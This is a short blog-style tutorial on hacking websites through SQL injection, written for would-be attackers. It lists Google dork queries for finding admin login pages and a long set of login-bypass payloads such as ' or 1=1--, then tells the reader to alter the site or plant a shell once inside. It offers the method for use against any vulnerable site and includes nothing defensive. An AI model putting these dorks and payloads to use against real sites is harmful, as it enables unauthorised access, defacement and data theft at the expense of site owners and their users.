Hello guys I will show you how to hack website using SQL injection attack.
What is SQL Injection Attack
SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities.HOw is SQL Injection Attack (SQLIA) :
By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Now I am going to show how it works, you just follows my steps….Step By Step SQL Injection Attack :
Step 1 :- First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.
Use any one of the following…
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
-“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
“inurl: admin.php”
“inurl: login/admin.php”
“inurl: admin/login.php”
“inurl: adminlogin.php”
“inurl: adminhome.php”
“inurl: admin_login.php”
“inurl: administratorlogin.php”
“inurl: login/administrator.php”
“inurl: administrator_login.php”
you see there is many admin page open, now just open any one page.
Step 2 :- Now you can use the following code and inject into user id and password field.
For user id used admin as user id.
And in password field use one one of the following code and some times these codes are also used for both user id as well as password.
test’or1–
‘or 1=1#
1’or’1’=’1
‘)or1=1—
‘or ” = ‘
‘or’1’=’1
‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
‘or’1=1’
‘or’ ‘=’
After injection you have successfully login into admin page now you can do any modify or change in this website you can put shell into website .
thanks for reading my article you should share it on social media . again thanks